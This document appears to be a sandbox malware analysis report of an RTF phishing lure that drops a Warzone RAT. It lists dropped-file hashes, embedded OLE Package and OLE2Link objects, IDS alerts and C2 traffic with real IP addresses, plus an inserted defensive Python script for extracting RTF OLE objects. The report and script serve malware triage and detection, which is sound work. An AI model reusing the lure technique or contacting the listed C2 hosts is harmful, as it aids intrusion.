                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):974336
                    Entropy (8bit):6.592752877706246
                    Encrypted:false
                    SSDEEP:12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
                    MD5:87B246B26208A9831A4372664C518C2C
                    SHA1:1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
                    SHA-256:27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
                    SHA-512:4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.....*..0...........s......o......(.....*...0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):974336
                    Entropy (8bit):6.592752877706246
                    Encrypted:false
                    SSDEEP:12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
                    MD5:87B246B26208A9831A4372664C518C2C
                    SHA1:1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
                    SHA-256:27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
                    SHA-512:4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.....*..0...........s......o......(.....*...0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                    MD5:7CFA404FD881AF8DF49EA584FE153C61
                    SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                    SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                    SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                    File type:Rich Text Format data, version 1, unknown character set
                    Entropy (8bit):3.0298782156742794
                    TrID:
                    • Rich Text Format (5005/1) 55.56%
                    • Rich Text Format (4004/1) 44.44%
                    File name:Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
                    File size:221545
                    MD5:9bc102ffb0930f5dee65bde8e0ba6d89
                    SHA1:37cac7507a6ad02a75d947a9bdfe115f2da8b71b
                    SHA256:959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
                    SHA512:acdb50e95c30e14b235a89ed4a86531a64c1c3246b3d65a116a80e64a6f9d061c7a2dc784b9942cf1beb5d7fbdd6302139347a490886386d54c0dc372404e0fd
                    SSDEEP:1536:9mDDRxjrfUG7NP0UlAD8KEmt09N/FUr1nvX+EEFZVzFz76mAg5eeVhMDw5wfLz:94F1lVzFtr5RDAw5wfP
                    TLSH:5824B9B4694F08B2C309DC1E25A87655AE79FEA374C154B223AFE034CF5ABF29EC4541
                    File Content Preview:{\rtf1\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c667364
                    Icon Hash:e4eea2aaa4b4b4a4
                    Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                    0 | 000007D1h | 2 | embedded | package | 15065 | DZdtfhgYgeghD{.scT | C:\osdsTggH\DZdtfhgYgeghD{.scT | C:\9jkepaD\DZdtfhgYgeghD{.scT | no
                    1 | 00008329h | 2 | embedded | OLE2LInk | 2560 | | | | no
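The two rows above are what the "Found suspicious RTF objects" signature rests on: an OLE 1.0 Package object whose label ends in .scT and which names a source and a temp path, and an OLE2Link object. The script below is an added worked example, not part of the Joe Sandbox report or its tooling: it walks an RTF for \objdata groups, decodes the OLE 1.0 object header and, for Package objects, the Packager payload header (label, source path, temp path, data), then applies a small triage heuristic. The SAMPLE_RTF it builds is constructed: the label and paths are copied from the table, the payload bytes and the OLE2Link body are placeholders, and ACTIVE_EXTS and suspicious() are the example's own rules, not the sandbox's.

```python
"""Pull OLE 1.0 objects out of an RTF file and unpack Packager payloads.
Added example, not Joe Sandbox code. SAMPLE_RTF at the bottom is constructed:
label and paths come from the report's object table, the payload bytes and
the OLE2Link body are placeholders (the latter is not a real compound file)."""
import re
import struct
from dataclasses import dataclass

# Extensions the Packager hands to ShellExecute when its icon is double-clicked.
ACTIVE_EXTS = {"exe", "dll", "scr", "com", "js", "vbs", "sct", "hta", "lnk", "ps1", "bat", "cmd"}

@dataclass
class RtfObject:
    format_id: int          # OLE1 FormatID: 1 = linked, 2 = embedded (-1 = unparseable)
    class_name: str
    native: bytes           # NativeData of an embedded object
    filename: str = ""      # the remaining fields are filled for Package objects
    source_path: str = ""
    temp_path: str = ""
    payload: bytes = b""

def _lp_ansi(buf, pos):
    """OLE1 LengthPrefixedAnsiString: uint32 length (NUL included) then the bytes."""
    (n,) = struct.unpack_from("<I", buf, pos)
    return buf[pos + 4:pos + 4 + n].rstrip(b"\0").decode("latin-1"), pos + 4 + n

def parse_ole1(blob):
    """ObjectHeader: uint32 OLEVersion, uint32 FormatID, class/topic/item strings;
    an embedded object then carries uint32 NativeDataSize followed by NativeData."""
    _ver, fmt = struct.unpack_from("<II", blob, 0)
    cls, pos = _lp_ansi(blob, 8)
    for _ in range(2):                       # TopicName, ItemName (unused here)
        _, pos = _lp_ansi(blob, pos)
    native = blob[pos + 4:pos + 4 + struct.unpack_from("<I", blob, pos)[0]] if fmt == 2 else b""
    return fmt, cls, native

def parse_package(native):
    """Packager NativeData: uint16 0x0002, label NUL, source path NUL, uint32 type
    (3 = file), uint32 temp-path length, temp path, uint32 size, then the file data."""
    label, source, rest = native[2:].split(b"\0", 2)
    _type, tlen = struct.unpack_from("<II", rest, 0)
    temp = rest[8:8 + tlen].rstrip(b"\0")
    (size,) = struct.unpack_from("<I", rest, 8 + tlen)
    data = rest[12 + tlen:12 + tlen + size]
    return label.decode("latin-1"), source.decode("latin-1"), temp.decode("latin-1"), data

def _objdata_groups(rtf):
    """Yield each \\objdata group body, walking braces so nested groups do not cut it short."""
    for m in re.finditer(rb"\\objdata\b", rtf):
        depth, i = 0, m.end()
        while i < len(rtf) and (rtf[i] != 0x7D or depth):
            depth += (rtf[i] == 0x7B) - (rtf[i] == 0x7D)
            i += 1
        yield rtf[m.end():i]

def extract_objects(rtf):
    objs = []
    for body in _objdata_groups(rtf):
        body = re.sub(rb"\\[A-Za-z]+-?\d* ?", b"", body)   # drop control words injected into the hex
        hexdata = re.sub(rb"[^0-9A-Fa-f]", b"", body)      # keep the hex digits only
        blob = bytes.fromhex(hexdata[:len(hexdata) & ~1].decode())
        try:
            fmt, cls, native = parse_ole1(blob)
            obj = RtfObject(fmt, cls, native)
            if fmt == 2 and cls == "Package":
                obj.filename, obj.source_path, obj.temp_path, obj.payload = parse_package(native)
        except (struct.error, ValueError):
            obj = RtfObject(-1, "<unparseable>", blob)
        objs.append(obj)
    return objs

def suspicious(obj):
    """Reasons to pull the object for manual review (empty list = none)."""
    reasons = []
    if obj.class_name == "Package":
        ext = obj.filename.rsplit(".", 1)[-1].lower() if "." in obj.filename else ""
        if ext in ACTIVE_EXTS:
            reasons.append(f"Package drops active content: {obj.filename}")
    if obj.class_name.lower() == "ole2link":
        reasons.append("OLE2Link object: the moniker loader abused by CVE-2017-0199 documents")
    return reasons

# Builders for the constructed sample; they are the inverse of the parsers above.
def _lp(s):
    b = s.encode("latin-1") + b"\0" if s else b""
    return struct.pack("<I", len(b)) + b
def build_ole1(cls, native):
    return (struct.pack("<II", 0x501, 2) + _lp(cls) + _lp("") + _lp("")
            + struct.pack("<I", len(native)) + native)
def build_package(label, source, temp, payload):
    t = temp.encode("latin-1") + b"\0"
    return (b"\x02\x00" + label.encode("latin-1") + b"\0" + source.encode("latin-1") + b"\0"
            + struct.pack("<II", 3, len(t)) + t + struct.pack("<I", len(payload)) + payload)
def build_rtf(blobs):
    body = b"".join(b"{\\object\\objemb{\\*\\objdata " + b.hex().encode() + b"}}" for b in blobs)
    return b"{\\rtf1\\ansi " + body + b"}"

SAMPLE_RTF = build_rtf([
    build_ole1("Package", build_package("DZdtfhgYgeghD{.scT", r"C:\osdsTggH\DZdtfhgYgeghD{.scT",
                                         r"C:\9jkepaD\DZdtfhgYgeghD{.scT", b"<constructed payload>")),
    build_ole1("OLE2Link", b"\xd0\xcf\x11\xe0" + b"\0" * 60),   # placeholder, not a real CFB
])
```

Calling extract_objects(SAMPLE_RTF) yields the same columns the table shows (format 2, class, size, label, source path, temp path), and suspicious() flags the Package for its .scT label and the OLE2Link for its class. The control-word stripping and brace walking cover only the simplest obfuscations; for real triage use rtfobj from oletools, which handles the many tricks this example does not.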
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    09/23/22-08:15:52.235686 | TCP | 2852329 | ETPRO TROJAN Ave Maria/Warzone RAT PingCommand | 7800 | 49173 | 20.126.95.155 | 192.168.2.22
                    09/23/22-08:15:32.226881 | TCP | 2852326 | ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket | 7800 | 49173 | 20.126.95.155 | 192.168.2.22
                    09/23/22-08:15:32.237815 | TCP | 2852328 | ETPRO TROJAN Ave Maria/Warzone RAT PingResponse | 49173 | 7800 | 192.168.2.22 | 20.126.95.155
                    09/23/22-08:13:32.180190 | TCP | 2036735 | ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) | 7800 | 49173 | 20.126.95.155 | 192.168.2.22
                    09/23/22-08:15:32.237815 | TCP | 2036734 | ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin | 49173 | 7800 | 192.168.2.22 | 20.126.95.155
                    09/23/22-08:13:32.470320 | TCP | 2852327 | ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse | 49173 | 7800 | 192.168.2.22 | 20.126.95.155
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Sep 23, 2022 08:13:01.808065891 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.839801073 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.839961052 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.840199947 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.870269060 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.870949984 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.870994091 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871057987 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871066093 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871123075 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871141911 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871172905 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871212959 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871246099 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871253967 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871256113 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871282101 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871296883 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871320009 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871339083 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871364117 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871407986 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.871417999 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.871483088 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.875750065 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903110981 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903160095 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903203011 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903204918 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903249025 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903278112 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903285027 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903287888 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903316021 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903328896 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903358936 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903414965 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903453112 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903493881 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903522968 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903544903 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903660059 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903698921 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903738022 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903743029 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903772116 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903779984 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903806925 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903819084 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903845072 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903873920 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.903934002 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903973103 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.903995991 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.904012918 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.904035091 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.904071093 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.904133081 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.904175043 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.904205084 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.904215097 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.904238939 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.904256105 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.904273987 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.904293060 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.905054092 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.933777094 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.933832884 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.933871984 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.933908939 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.933921099 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.933937073 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.933968067 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.933986902 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934010983 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934030056 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934055090 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
